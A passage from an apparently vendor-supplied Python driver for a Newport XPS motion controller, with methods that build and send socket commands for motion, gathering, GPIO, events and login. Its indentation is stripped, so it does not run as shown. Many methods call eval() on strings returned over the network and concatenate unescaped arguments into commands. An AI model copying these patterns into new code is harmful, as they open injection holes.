# FirmwareVersionGet : Return firmware version
def FirmwareVersionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'FirmwareVersionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecute : Execute a TCL script from a TCL file
def TCLScriptExecute (self, socketId, TCLFileName, TaskName, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecute(' + TCLFileName + ',' + TaskName + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteAndWait : Execute a TCL script from a TCL file and wait the end of execution to return
def TCLScriptExecuteAndWait (self, socketId, TCLFileName, TaskName, InputParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteAndWait(' + TCLFileName + ',' + TaskName + ',' + InputParametersList + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptExecuteWithPriority : Execute a TCL script with defined priority
def TCLScriptExecuteWithPriority (self, socketId, TCLFileName, TaskName, TaskPriorityLevel, ParametersList):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptExecuteWithPriority(' + TCLFileName + ',' + TaskName + ',' + TaskPriorityLevel + ',' + ParametersList + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TCLScriptKill : Kill TCL Task
def TCLScriptKill (self, socketId, TaskName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TCLScriptKill(' + TaskName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# TimerGet : Get a timer
def TimerGet (self, socketId, TimerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TimerGet(' + TimerName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# TimerSet : Set a timer
def TimerSet (self, socketId, TimerName, FrequencyTicks):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'TimerSet(' + TimerName + ',' + str(FrequencyTicks) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Reboot : Reboot the controller
def Reboot (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Reboot()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# Login : Log in
def Login (self, socketId, Name, Password):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'Login(' + Name + ',' + Password + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# CloseAllOtherSockets : Close all socket beside the one used to send this command
def CloseAllOtherSockets (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'CloseAllOtherSockets()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeGet : Return hardware date and time
def HardwareDateAndTimeGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# HardwareDateAndTimeSet : Set hardware date and time
def HardwareDateAndTimeSet (self, socketId, DateAndTime):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'HardwareDateAndTimeSet(' + DateAndTime + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventAdd : ** OBSOLETE ** Add an event
def EventAdd (self, socketId, PositionerName, EventName, EventParameter, ActionName, ActionParameter1, ActionParameter2, ActionParameter3):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventAdd(' + PositionerName + ',' + EventName + ',' + EventParameter + ',' + ActionName + ',' + ActionParameter1 + ',' + ActionParameter2 + ',' + ActionParameter3 + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventGet : ** OBSOLETE ** Read events and actions list
def EventGet (self, socketId, PositionerName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventGet(' + PositionerName + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventRemove : ** OBSOLETE ** Delete an event
def EventRemove (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventRemove(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventWait : ** OBSOLETE ** Wait an event
def EventWait (self, socketId, PositionerName, EventName, EventParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventWait(' + PositionerName + ',' + EventName + ',' + EventParameter + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerSet : Configure one or several events
def EventExtendedConfigurationTriggerSet (self, socketId, ExtendedEventName, EventParameter1, EventParameter2, EventParameter3, EventParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerSet('
for i in range(len(ExtendedEventName)):
if (i > 0):
command += ','
command += ExtendedEventName[i] + ',' + EventParameter1[i] + ',' + EventParameter2[i] + ',' + EventParameter3[i] + ',' + EventParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationTriggerGet : Read the event configuration
def EventExtendedConfigurationTriggerGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationTriggerGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionSet : Configure one or several actions
def EventExtendedConfigurationActionSet (self, socketId, ExtendedActionName, ActionParameter1, ActionParameter2, ActionParameter3, ActionParameter4):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionSet('
for i in range(len(ExtendedActionName)):
if (i > 0):
command += ','
command += ExtendedActionName[i] + ',' + ActionParameter1[i] + ',' + ActionParameter2[i] + ',' + ActionParameter3[i] + ',' + ActionParameter4[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedConfigurationActionGet : Read the action configuration
def EventExtendedConfigurationActionGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedConfigurationActionGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedStart : Launch the last event and action configuration and return an ID
def EventExtendedStart (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedStart(int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# EventExtendedAllGet : Read all event and action configurations
def EventExtendedAllGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedAllGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedGet : Read the event and action configuration defined by ID
def EventExtendedGet (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedGet(' + str(ID) + ',char *,char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedRemove : Remove the event and action configuration defined by ID
def EventExtendedRemove (self, socketId, ID):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedRemove(' + str(ID) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# EventExtendedWait : Wait events from the last event configuration
def EventExtendedWait (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'EventExtendedWait()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationGet : Read different mnemonique type
def GatheringConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringConfigurationSet : Configuration acquisition
def GatheringConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringStopAndSave : Stop acquisition and save data
def GatheringStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataAcquire : Acquire a configured data
def GatheringDataAcquire (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataAcquire()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataGet : Get a data line from gathering buffer
def GatheringDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringDataMultipleLinesGet : Get multiple data lines from gathering buffer
def GatheringDataMultipleLinesGet (self, socketId, IndexPoint, NumberOfLines):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringDataMultipleLinesGet(' + str(IndexPoint) + ',' + str(NumberOfLines) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringReset : Empty the gathered data in memory to start new gathering from scratch
def GatheringReset (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringReset()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRun : Start a new gathering
def GatheringRun (self, socketId, DataNumber, Divisor):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRun(' + str(DataNumber) + ',' + str(Divisor) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringRunAppend : Re-start the stopped gathering to add new data
def GatheringRunAppend (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringRunAppend()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringStop : Stop the data gathering (without saving to file)
def GatheringStop (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringStop()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationSet : Configuration acquisition
def GatheringExternalConfigurationSet (self, socketId, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationSet('
for i in range(len(Type)):
if (i > 0):
command += ','
command += Type[i]
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalConfigurationGet : Read different mnemonique type
def GatheringExternalConfigurationGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalConfigurationGet(char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalCurrentNumberGet : Maximum number of samples and current number during acquisition
def GatheringExternalCurrentNumberGet (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalCurrentNumberGet(int *,int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GatheringExternalDataGet : Get a data line from external gathering buffer
def GatheringExternalDataGet (self, socketId, IndexPoint):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalDataGet(' + str(IndexPoint) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GatheringExternalStopAndSave : Stop acquisition and save data
def GatheringExternalStopAndSave (self, socketId):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GatheringExternalStopAndSave()'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArrayGet : Get global array value
def GlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArrayGet(' + str(Number) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GlobalArraySet : Set global array value
def GlobalArraySet (self, socketId, Number, ValueString):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GlobalArraySet(' + str(Number) + ',' + ValueString + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# DoubleGlobalArrayGet : Get double global array value
def DoubleGlobalArrayGet (self, socketId, Number):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArrayGet(' + str(Number) + ',double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# DoubleGlobalArraySet : Set double global array value
def DoubleGlobalArraySet (self, socketId, Number, DoubleValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'DoubleGlobalArraySet(' + str(Number) + ',' + str(DoubleValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGet : Read analog input or analog output for one or few input
def GPIOAnalogGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogSet : Set analog output for one or few output
def GPIOAnalogSet (self, socketId, GPIOName, AnalogOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogOutputValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIOAnalogGainGet : Read analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainGet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + 'int *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(len(GPIOName)):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GPIOAnalogGainSet : Set analog input gain (1, 2, 4 or 8) for one or few input
def GPIOAnalogGainSet (self, socketId, GPIOName, AnalogInputGainValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIOAnalogGainSet('
for i in range(len(GPIOName)):
if (i > 0):
command += ','
command += GPIOName[i] + ',' + str(AnalogInputGainValue[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GPIODigitalGet : Read digital output or digital input
def GPIODigitalGet (self, socketId, GPIOName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalGet(' + GPIOName + ',unsigned short *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GPIODigitalSet : Set Digital Output for one or few output TTL
def GPIODigitalSet (self, socketId, GPIOName, Mask, DigitalOutputValue):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GPIODigitalSet(' + GPIOName + ',' + str(Mask) + ',' + str(DigitalOutputValue) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAccelerationSetpointGet : Return setpoint accelerations
def GroupAccelerationSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAccelerationSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupAnalogTrackingModeEnable : Enable Analog Tracking mode on selected group
def GroupAnalogTrackingModeEnable (self, socketId, GroupName, Type):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeEnable(' + GroupName + ',' + Type + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupAnalogTrackingModeDisable : Disable Analog Tracking mode on selected group
def GroupAnalogTrackingModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupAnalogTrackingModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupCorrectorOutputGet : Return corrector outputs
def GroupCorrectorOutputGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCorrectorOutputGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupCurrentFollowingErrorGet : Return current following errors
def GroupCurrentFollowingErrorGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupCurrentFollowingErrorGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupHomeSearch : Start home search sequence
def GroupHomeSearch (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearch(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupHomeSearchAndRelativeMove : Start home search sequence and execute a displacement
def GroupHomeSearchAndRelativeMove (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupHomeSearchAndRelativeMove(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitialize : Start the initialization
def GroupInitialize (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitialize(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupInitializeWithEncoderCalibration : Start the initialization with encoder calibration
def GroupInitializeWithEncoderCalibration (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupInitializeWithEncoderCalibration(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersSet : Modify Jog parameters on selected group and activate the continuous move
def GroupJogParametersSet (self, socketId, GroupName, Velocity, Acceleration):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersSet(' + GroupName + ','
for i in range(len(Velocity)):
if (i > 0):
command += ','
command += str(Velocity[i]) + ',' + str(Acceleration[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogParametersGet : Get Jog parameters on selected group
def GroupJogParametersGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogParametersGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogCurrentGet : Get Jog current on selected group
def GroupJogCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *' + ',' + 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement*2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupJogModeEnable : Enable Jog mode on selected group
def GroupJogModeEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupJogModeDisable : Disable Jog mode on selected group
def GroupJogModeDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupJogModeDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupKill : Kill the group
def GroupKill (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupKill(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbort : Abort a move
def GroupMoveAbort (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbort(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveAbsolute : Do an absolute move
def GroupMoveAbsolute (self, socketId, GroupName, TargetPosition):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveAbsolute(' + GroupName + ','
for i in range(len(TargetPosition)):
if (i > 0):
command += ','
command += str(TargetPosition[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMoveRelative : Do a relative move
def GroupMoveRelative (self, socketId, GroupName, TargetDisplacement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMoveRelative(' + GroupName + ','
for i in range(len(TargetDisplacement)):
if (i > 0):
command += ','
command += str(TargetDisplacement[i])
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionDisable : Set Motion disable on selected group
def GroupMotionDisable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionDisable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupMotionEnable : Set Motion enable on selected group
def GroupMotionEnable (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupMotionEnable(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupPositionCorrectedProfilerGet : Return corrected profiler positions
def GroupPositionCorrectedProfilerGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCorrectedProfilerGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionCurrentGet : Return current positions
def GroupPositionCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionPCORawEncoderGet : Return PCO raw encoder positions
def GroupPositionPCORawEncoderGet (self, socketId, GroupName, PositionX, PositionY):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionPCORawEncoderGet(' + GroupName + ',' + str(PositionX) + ',' + str(PositionY) + ',double *,double *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(2):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionSetpointGet : Return setpoint positions
def GroupPositionSetpointGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionSetpointGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupPositionTargetGet : Return target positions
def GroupPositionTargetGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupPositionTargetGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# GroupReferencingActionExecute : Execute an action in referencing mode
def GroupReferencingActionExecute (self, socketId, PositionerName, ReferencingAction, ReferencingSensor, ReferencingParameter):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingActionExecute(' + PositionerName + ',' + ReferencingAction + ',' + ReferencingSensor + ',' + str(ReferencingParameter) + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStart : Enter referencing mode
def GroupReferencingStart (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStart(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupReferencingStop : Exit referencing mode
def GroupReferencingStop (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupReferencingStop(' + GroupName + ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupStatusGet : Return group status
def GroupStatusGet (self, socketId, GroupName):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusGet(' + GroupName + ',int *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
return retList
# GroupStatusStringGet : Return the group status string corresponding to the group status code
def GroupStatusStringGet (self, socketId, GroupStatusCode):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupStatusStringGet(' + str(GroupStatusCode) + ',char *)'
[error, returnedString] = self.__sendAndReceive(socketId, command)
return [error, returnedString]
# GroupVelocityCurrentGet : Return current velocities
def GroupVelocityCurrentGet (self, socketId, GroupName, nbElement):
if (XPS.__usedSockets[socketId] == 0):
return
command = 'GroupVelocityCurrentGet(' + GroupName + ','
for i in range(nbElement):
if (i > 0):
command += ','
command += 'double *'
command += ')'
[error, returnedString] = self.__sendAndReceive(socketId, command)
if (error != 0):
return [error, returnedString]
i, j, retList = 0, 0, [error]
for paramNb in range(nbElement):
while ((i+j) < len(returnedString) and returnedString[i+j] != ','):
j += 1
retList.append(eval(returnedString[i:i+j]))
i, j = i+j+1, 0
return retList
# KillAll : Put all groups in 'Not initialized' state
def KillAll (self, socketId):
